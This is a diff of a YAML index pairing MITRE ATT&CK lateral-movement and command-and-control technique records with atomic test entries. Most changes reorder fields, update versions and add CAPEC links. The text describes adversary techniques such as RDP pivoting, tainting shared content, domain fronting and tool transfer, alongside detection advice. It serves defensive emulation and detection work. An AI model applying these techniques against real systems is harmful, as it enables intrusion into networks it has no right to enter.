- may then perform actions as the logged-on user.\n\nRemote desktop is a common
- feature in operating systems. It allows a user to log into an interactive
- session with a system desktop graphical user interface on a remote system.
- Microsoft refers to its implementation of the Remote Desktop Protocol (RDP)
- as Remote Desktop Services (RDS).(Citation: TechNet Remote Desktop Services)
- \n\nAdversaries may connect to a remote system over RDP/RDS to expand access
- if the service is enabled and allows access to accounts with known credentials.
- Adversaries will likely use Credential Access techniques to acquire credentials
- to use with RDP. Adversaries may also use RDP in conjunction with the [Accessibility
- Features](https://attack.mitre.org/techniques/T1546/008) technique for Persistence.(Citation:
- Alperovitch Malware)"
- id: attack-pattern--eb062747-2193-45de-8fa2-e62549c37ddf
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-02-25T19:23:34.204Z'
- created: '2020-02-11T18:23:26.059Z'
- x_mitre_contributors:
- - Matthew Demaske, Adaptforward
- x_mitre_system_requirements:
- - RDP service enabled, account in the Remote Desktop Users group
- x_mitre_data_sources:
- - Process monitoring
- - Netflow/Enclave netflow
- - Authentication logs
- x_mitre_permissions_required:
- - Remote Desktop Users
- - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
x_mitre_detection: Use of RDP may be legitimate, depending on the network environment
and how it is used. Other factors, such as access patterns and activity that
occurs after a remote login, may indicate suspicious or malicious behavior
with RDP. Monitor for user accounts logged into systems they would not normally
access or access patterns to multiple systems over a relatively short period
of time.
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_platforms:
- - Windows
+ x_mitre_permissions_required:
+ - Remote Desktop Users
+ - User
+ x_mitre_data_sources:
+ - Process monitoring
+ - Netflow/Enclave netflow
+ - Authentication logs
+ x_mitre_system_requirements:
+ - RDP service enabled, account in the Remote Desktop Users group
+ x_mitre_contributors:
+ - Matthew Demaske, Adaptforward
identifier: T1021.001
atomic_tests:
- name: RDP to DomainController
@@ -47895,8 +55911,11 @@ lateral-movement:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
- url: https://attack.mitre.org/techniques/T1072
external_id: T1072
+ url: https://attack.mitre.org/techniques/T1072
+ - external_id: CAPEC-187
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/187.html
description: |-
Adversaries may gain access to and use third-party software suites installed within an enterprise network, such as administration, monitoring, and deployment systems, to move laterally through the network. Third-party applications and software deployment systems may be in use in the network environment for administration purposes (e.g., SCCM, VNC, HBSS, Altiris, etc.).
@@ -47912,10 +55931,10 @@ lateral-movement:
phase_name: execution
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-02-21T16:31:32.789Z'
+ modified: '2020-09-16T15:27:01.403Z'
created: '2017-05-31T21:30:57.201Z'
x_mitre_is_subtechnique: false
- x_mitre_version: '2.0'
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- Authentication logs
- File monitoring
@@ -47956,16 +55975,14 @@ lateral-movement:
atomic_tests: []
T1080:
technique:
- id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Taint Shared Content
- description: |2-
-
- Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
-
- A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
-
- Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
+ created: '2017-05-31T21:31:01.759Z'
+ modified: '2020-03-31T22:14:56.107Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: lateral-movement
+ type: attack-pattern
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1080
@@ -47977,32 +55994,34 @@ lateral-movement:
description: Routin, D. (2017, November 13). Abusing network shares for efficient
lateral movements and privesc (DirSharePivot). Retrieved April 12, 2018.
source_name: Retwin Directory Share Pivot
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: lateral-movement
- modified: '2020-03-31T22:14:56.107Z'
- created: '2017-05-31T21:31:01.759Z'
- x_mitre_is_subtechnique: false
- x_mitre_system_requirements:
- - Access to shared folders and content with write permissions
- x_mitre_platforms:
- - Windows
- x_mitre_permissions_required:
- - User
+ description: |2-
+
+ Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
+
+ A directory share pivot is a variation on this technique that uses several other techniques to propagate malware when users access a shared network directory. It uses [Shortcut Modification](https://attack.mitre.org/techniques/T1547/009) of directory .LNK files that use [Masquerading](https://attack.mitre.org/techniques/T1036) to look like the real directories, which are hidden through [Hidden Files and Directories](https://attack.mitre.org/techniques/T1564/001). The malicious .LNK-based directories have an embedded command that executes the hidden malware file in the directory and then opens the real intended directory so that the user's expected action still occurs. When used with frequently used network directories, the technique may result in frequent reinfections and broad access to systems and potentially to new and higher privileged accounts. (Citation: Retwin Directory Share Pivot)
+
+ Adversaries may also compromise shared network directories through binary infections by appending or prepending its code to the healthy binary on the shared network directory. The malware may modify the original entry point (OEP) of the healthy binary to ensure that it is executed before the legitimate code. The infection could continue to spread via the newly infected file when it is executed by a remote system. These infections may target both binary and non-binary formats that end with extensions including, but not limited to, .EXE, .DLL, .SCR, .BAT, and/or .VBS.
+ name: Taint Shared Content
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--246fd3c7-f5e3-466d-8787-4c13d9e3b61c
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - File monitoring
+ - Process monitoring
+ x_mitre_contributors:
+ - Michal Dida, ESET
+ - David Routin
x_mitre_detection: |-
Processes that write or overwrite many files to a network shared directory may be suspicious. Monitor processes that are executed from removable media for malicious or abnormal activity such as network connections due to Command and Control and possible network Discovery techniques.
Frequently scan shared network directories for malicious files, hidden files, .LNK files, and other file types that may not typical exist in directories used to share specific types of content.
- x_mitre_contributors:
- - Michal Dida, ESET
- - David Routin
- x_mitre_data_sources:
- - File monitoring
- - Process monitoring
- x_mitre_version: '1.2'
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Windows
+ x_mitre_system_requirements:
+ - Access to shared folders and content with write permissions
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1550:
technique:
@@ -48050,7 +56069,7 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.608Z'
+ modified: '2020-09-16T19:40:44.714Z'
created: '2020-01-30T16:18:36.873Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: false
@@ -48123,6 +56142,9 @@ lateral-movement:
- source_name: mitre-attack
external_id: T1550.004
url: https://attack.mitre.org/techniques/T1550/004
+ - external_id: CAPEC-60
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/60.html
- description: Rehberger, J. (2018, December). Pivot to the Cloud using Pass
the Cookie. Retrieved April 5, 2019.
url: https://wunderwuzzi23.github.io/blog/passthecookie.html
@@ -48148,9 +56170,9 @@ lateral-movement:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: lateral-movement
- modified: '2020-03-24T12:36:24.501Z'
+ modified: '2020-09-16T19:40:44.527Z'
created: '2020-01-30T17:48:49.395Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_defense_bypassed:
- System Access Controls
@@ -48292,23 +56314,8 @@ lateral-movement:
command-and-control:
T1071:
technique:
- created: '2017-05-31T21:30:56.776Z'
- modified: '2020-03-27T19:02:44.772Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
- id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Application Layer Protocol
- description: "Adversaries may communicate using application layer protocols
- to avoid detection/network filtering by blending in with existing traffic.
- Commands to the remote system, and often the results of those commands, will
- be embedded within the protocol traffic between the client and server. \n\nAdversaries
- may utilize many different protocols, including those used for web browsing,
- transferring files, electronic mail, or DNS. For connections that occur internally
- within an enclave (such as those between a proxy or pivot node and other nodes),
- commonly used protocols are SMB, SSH, or RDP. "
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1071
@@ -48317,21 +56324,24 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
- x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
- sending significantly more data than it receives from a server). Processes
- utilizing the network that do not normally have network communication or have
- never been seen before are suspicious. Analyze packet contents to detect application
- layer protocols that do not follow the expected protocol standards regarding
- syntax, structure, or any other variable adversaries could leverage to conceal
- data.(Citation: University of Birmingham C2)'
+ description: "Adversaries may communicate using application layer protocols
+ to avoid detection/network filtering by blending in with existing traffic.
+ Commands to the remote system, and often the results of those commands, will
+ be embedded within the protocol traffic between the client and server. \n\nAdversaries
+ may utilize many different protocols, including those used for web browsing,
+ transferring files, electronic mail, or DNS. For connections that occur internally
+ within an enclave (such as those between a proxy or pivot node and other nodes),
+ commonly used protocols are SMB, SSH, or RDP. "
+ name: Application Layer Protocol
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--355be19c-ffc9-46d5-8d50-d6a036c675b6
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-21T16:35:45.986Z'
+ created: '2017-05-31T21:30:56.776Z'
+ x_mitre_version: '2.0'
x_mitre_data_sources:
- DNS records
- Network protocol analysis
@@ -48339,10 +56349,37 @@ command-and-control:
- Netflow/Enclave netflow
- Process use of network
- Process monitoring
- x_mitre_version: '2.0'
+ x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
+ sending significantly more data than it receives from a server). Processes
+ utilizing the network that do not normally have network communication or have
+ never been seen before are suspicious. Analyze packet contents to detect application
+ layer protocols that do not follow the expected protocol standards regarding
+ syntax, structure, or any other variable adversaries could leverage to conceal
+ data.(Citation: University of Birmingham C2)'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
atomic_tests: []
T1573.002:
technique:
+ created: '2020-03-16T15:48:33.882Z'
+ modified: '2020-03-30T00:37:16.593Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada
+ description: |-
+ Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
+
+ For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
+ name: Asymmetric Cryptography
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1573.002
@@ -48359,37 +56396,22 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Asymmetric Cryptography
- description: |-
- Adversaries may employ a known asymmetric encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Asymmetric cryptography, also known as public key cryptography, uses a keypair per party: one public that can be freely distributed, and one private. Due to how the keys are generated, the sender encrypts data with the receiver’s public key and the receiver decrypts the data with their private key. This ensures that only the intended recipient can read the encrypted data. Common public key encryption algorithms include RSA and ElGamal.
-
- For efficiency, may protocols (including SSL/TLS) use symmetric cryptography once a connection is established, but use asymmetric cryptography to establish or transmit a key. As such, these protocols are classified as [Asymmetric Cryptography](https://attack.mitre.org/techniques/T1573/002).
- id: attack-pattern--bf176076-b789-408e-8cba-7275e81c0ada
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-30T00:37:16.593Z'
- created: '2020-03-16T15:48:33.882Z'
- x_mitre_version: '1.0'
- x_mitre_is_subtechnique: true
- x_mitre_detection: |-
- SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
-
- In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
x_mitre_data_sources:
- Process monitoring
- Process use of network
- Malware reverse engineering
- Netflow/Enclave netflow
- Packet capture
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
+ x_mitre_detection: |-
+ SSL/TLS inspection is one way of detecting command and control traffic within some encrypted communication channels.(Citation: SANS Decrypting SSL) SSL/TLS inspection does come with certain risks that should be considered before implementing to avoid potential security issues such as incomplete certificate validation.(Citation: SEI SSL Inspection Risks)
+
+ In general, analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
+ x_mitre_is_subtechnique: true
+ x_mitre_version: '1.0'
atomic_tests: []
T1102.002:
technique:
@@ -48452,9 +56474,23 @@ command-and-control:
atomic_tests: []
T1043:
technique:
- id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: Commonly Used Port
+ created: '2017-05-31T21:30:42.657Z'
+ modified: '2020-07-06T17:54:28.071Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ revoked: false
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ external_references:
+ - source_name: mitre-attack
+ external_id: T1043
+ url: https://attack.mitre.org/techniques/T1043
+ - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
+ description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
+ & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
+ source_name: University of Birmingham C2
description: "**This technique has been deprecated. Please use [Non-Standard
Port](https://attack.mitre.org/techniques/T1571) where appropriate.**\n\nAdversaries
may communicate over a commonly used port to bypass firewalls or network detection
@@ -48465,42 +56501,28 @@ command-and-control:
occur internally within an enclave (such as those between a proxy or pivot
node and other nodes), examples of common ports are \n\n* TCP/UDP:135 (RPC)\n*
TCP/UDP:22 (SSH)\n* TCP/UDP:3389 (RDP)"
- external_references:
- - source_name: mitre-attack
- external_id: T1043
- url: https://attack.mitre.org/techniques/T1043
- - url: https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf
- description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
- & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
- source_name: University of Birmingham C2
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- revoked: false
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-07-06T17:54:28.071Z'
- created: '2017-05-31T21:30:42.657Z'
- x_mitre_deprecated: true
- x_mitre_is_subtechnique: false
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_network_requirements: true
+ name: Commonly Used Port
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ id: attack-pattern--f879d51c-5476-431c-aedf-f14d207e4d1e
+ x_mitre_version: '1.0'
+ x_mitre_data_sources:
+ - Packet capture
+ - Netflow/Enclave netflow
+ - Process use of network
+ - Process monitoring
x_mitre_detection: 'Analyze network data for uncommon data flows (e.g., a client
sending significantly more data than it receives from a server). Processes
utilizing the network that do not normally have network communication or have
never been seen before are suspicious. Analyze packet contents to detect communications
that do not follow the expected protocol behavior for the port that is being
used. (Citation: University of Birmingham C2)'
- x_mitre_data_sources:
- - Packet capture
- - Netflow/Enclave netflow
- - Process use of network
- - Process monitoring
- x_mitre_version: '1.0'
+ x_mitre_network_requirements: true
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_is_subtechnique: false
+ x_mitre_deprecated: true
atomic_tests: []
T1092:
technique:
@@ -48579,7 +56601,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-27T19:02:44.600Z'
+ modified: '2020-10-21T16:26:34.196Z'
created: '2020-03-15T16:27:31.768Z'
x_mitre_contributors:
- Jan Petrov, Citi
@@ -48590,11 +56612,10 @@ command-and-control:
Monitor for DNS traffic to/from known-bad or suspicious domains.
x_mitre_data_sources:
- - DNS records
- Netflow/Enclave netflow
+ - DNS records
- Process monitoring
- Process use of network
- - Netflow/Enclave netflow
- Packet capture
x_mitre_platforms:
- Linux
@@ -48932,6 +56953,9 @@ command-and-control:
- source_name: mitre-attack
external_id: T1090.004
url: https://attack.mitre.org/techniques/T1090/004
+ - external_id: CAPEC-481
+ source_name: capec
+ url: https://capec.mitre.org/data/definitions/481.html
- url: http://www.icir.org/vern/papers/meek-PETS-2015.pdf
description: David Fifield, Chang Lan, Rod Hynes, Percy Wegmann, and Vern
Paxson. (2015). Blocking-resistant communication through domain fronting.
@@ -48951,9 +56975,9 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-06-20T20:53:20.398Z'
+ modified: '2020-09-16T19:30:54.226Z'
created: '2020-03-14T23:29:19.581Z'
- x_mitre_version: '1.0'
+ x_mitre_version: '1.1'
x_mitre_is_subtechnique: true
x_mitre_detection: 'If SSL inspection is in place or the traffic is not encrypted,
the Host field of the HTTP header can be checked if it matches the HTTPS SNI
@@ -49032,7 +57056,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-12T14:45:22.784Z'
+ modified: '2020-10-02T01:37:39.618Z'
created: '2020-03-10T17:44:59.787Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
@@ -49041,7 +57065,7 @@ command-and-control:
x_mitre_detection: |-
Detecting dynamically generated domains can be challenging due to the number of different DGA algorithms, constantly evolving malware families, and the increasing complexity of the algorithms. There is a myriad of approaches for detecting a pseudo-randomly generated domain name, including using frequency analysis, Markov chains, entropy, proportion of dictionary words, ratio of vowels to other characters, and more.(Citation: Data Driven Security DGA) CDN domains may trigger these detections due to the format of their domain names. In addition to detecting a DGA domain based on the name, another more general approach for detecting a suspicious domain is to check for recently registered names or for rarely visited domains.
- Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain or related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
+ Machine learning approaches to detecting DGA domains have been developed and have seen success in applications. One approach is to use N-Gram methods to determine a randomness score for strings used in the domain name. If the randomness score is high, and the domains are not whitelisted (CDN, etc), then it may be determined if a domain is related to a legitimate host or DGA.(Citation: Pace University Detecting DGA May 2017) Another approach is to use deep learning to classify domains as DGA-generated.(Citation: Endgame Predicting DGA)
x_mitre_data_sources:
- DNS records
- Netflow/Enclave netflow
@@ -49059,21 +57083,6 @@ command-and-control:
atomic_tests: []
T1568:
technique:
- created: '2020-03-10T17:28:11.747Z'
- modified: '2020-03-27T20:54:28.560Z'
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- type: attack-pattern
- id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
- description: |-
- Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
-
- Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
- name: Dynamic Resolution
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
external_references:
- source_name: mitre-attack
external_id: T1568
@@ -49094,18 +57103,23 @@ command-and-control:
url: https://datadrivensecurity.info/blog/posts/2014/Oct/dga-part2/
description: 'Jacobs, J. (2014, October 2). Building a DGA Classifier: Part
2, Feature Engineering. Retrieved February 18, 2019.'
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_permissions_required:
- - User
- x_mitre_is_subtechnique: false
- x_mitre_version: '1.0'
- x_mitre_data_sources:
- - SSL/TLS inspection
- - Web logs
- - DNS records
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Dynamic Resolution
+ description: |-
+ Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.
+
+ Adversaries may use dynamic resolution for the purpose of [Fallback Channels](https://attack.mitre.org/techniques/T1008). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.(Citation: Talos CCleanup 2017)(Citation: FireEye POSHSPY April 2017)(Citation: ESET Sednit 2017 Activity)
+ id: attack-pattern--7bd9c723-2f78-4309-82c5-47cad406572b
+ type: attack-pattern
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ modified: '2020-10-02T01:37:39.938Z'
+ created: '2020-03-10T17:28:11.747Z'
+ x_mitre_contributors:
+ - Chris Roffe
x_mitre_detection: 'Detecting dynamically generated C2 can be challenging due
to the number of different algorithms, constantly evolving malware families,
and the increasing complexity of the algorithms. There are multiple approaches
@@ -49116,8 +57130,18 @@ command-and-control:
names. In addition to detecting algorithm generated domains based on the name,
another more general approach for detecting a suspicious domain is to check
for recently registered names or for rarely visited domains.'
- x_mitre_contributors:
- - Chris Roffe
+ x_mitre_data_sources:
+ - SSL/TLS inspection
+ - Web logs
+ - DNS records
+ x_mitre_version: '1.0'
+ x_mitre_is_subtechnique: false
+ x_mitre_permissions_required:
+ - User
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
atomic_tests: []
T1573:
technique:
@@ -49370,7 +57394,7 @@ command-and-control:
associated with transferring files to avoid detection/network filtering by
blending in with existing traffic. Commands to the remote system, and often
the results of those commands, will be embedded within the protocol traffic
- between the client and server. \n\nProtocols such as FTP, FTPS, and TFPT that
+ between the client and server. \n\nProtocols such as FTP, FTPS, and TFTP that
transfer files may be very common in environments. Packets produced from
these protocols may have many fields and headers in which data can be concealed.
Data could also be concealed within the transferred files. An adversary may
@@ -49381,7 +57405,7 @@ command-and-control:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: command-and-control
- modified: '2020-03-26T20:26:46.465Z'
+ modified: '2020-08-21T14:41:22.911Z'
created: '2020-03-15T16:16:25.763Z'
x_mitre_version: '1.0'
x_mitre_is_subtechnique: true
@@ -49404,8 +57428,21 @@ command-and-control:
atomic_tests: []
T1105:
technique:
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ created: '2017-05-31T21:31:16.408Z'
+ modified: '2020-03-20T15:42:48.595Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ name: Ingress Tool Transfer
+ description: Adversaries may transfer tools or other files from an external
+ system into a compromised environment. Files may be copied from an external
+ adversary controlled system through the command and control channel to bring
+ tools into the victim network or through alternate protocols with another
+ tool such as FTP. Files can also be copied over on Mac and Linux with native
+ tools like scp, rsync, and sftp.
external_references:
- source_name: mitre-attack
external_id: T1105
@@ -49414,22 +57451,19 @@ command-and-control:
description: Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command
& Control Understanding, Denying and Detecting. Retrieved April 20, 2016.
source_name: University of Birmingham C2
- description: Adversaries may transfer tools or other files from an external
- system into a compromised environment. Files may be copied from an external
- adversary controlled system through the command and control channel to bring
- tools into the victim network or through alternate protocols with another
- tool such as FTP. Files can also be copied over on Mac and Linux with native
- tools like scp, rsync, and sftp.
- name: Ingress Tool Transfer
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- id: attack-pattern--e6919abc-99f9-4c6c-95a5-14761e7b2add
- type: attack-pattern
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: command-and-control
- modified: '2020-03-20T15:42:48.595Z'
- created: '2017-05-31T21:31:16.408Z'
- x_mitre_version: '2.0'
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - Linux
+ - macOS
+ - Windows
+ x_mitre_permissions_required:
+ - User
+ x_mitre_detection: |-
+ Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
+
+ Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
x_mitre_data_sources:
- Process command-line parameters
- File monitoring
@@ -49438,17 +57472,7 @@ command-and-control:
- Netflow/Enclave netflow
- Network protocol analysis
- Process monitoring
- x_mitre_detection: |-
- Monitor for file creation and files transferred into the network. Unusual processes with external network connections creating files on-system may be suspicious. Use of utilities, such as FTP, that does not normally occur may also be suspicious.
-
- Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used.(Citation: University of Birmingham C2)
- x_mitre_permissions_required:
- - User
- x_mitre_platforms:
- - Linux
- - macOS
- - Windows
- x_mitre_is_subtechnique: false
+ x_mitre_version: '2.0'
identifier: T1105
atomic_tests:
- name: rsync remote file copy (push)
@@ -49816,6 +57840,21 @@ command-and-control:
name: command_prompt
T1090.001:
technique:
+ created: '2020-03-14T23:08:20.244Z'
+ modified: '2020-03-15T00:46:26.598Z'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: command-and-control
+ type: attack-pattern
+ id: attack-pattern--f6dacc85-b37d-458e-b58d-74fc4bbf5755
+ description: |-
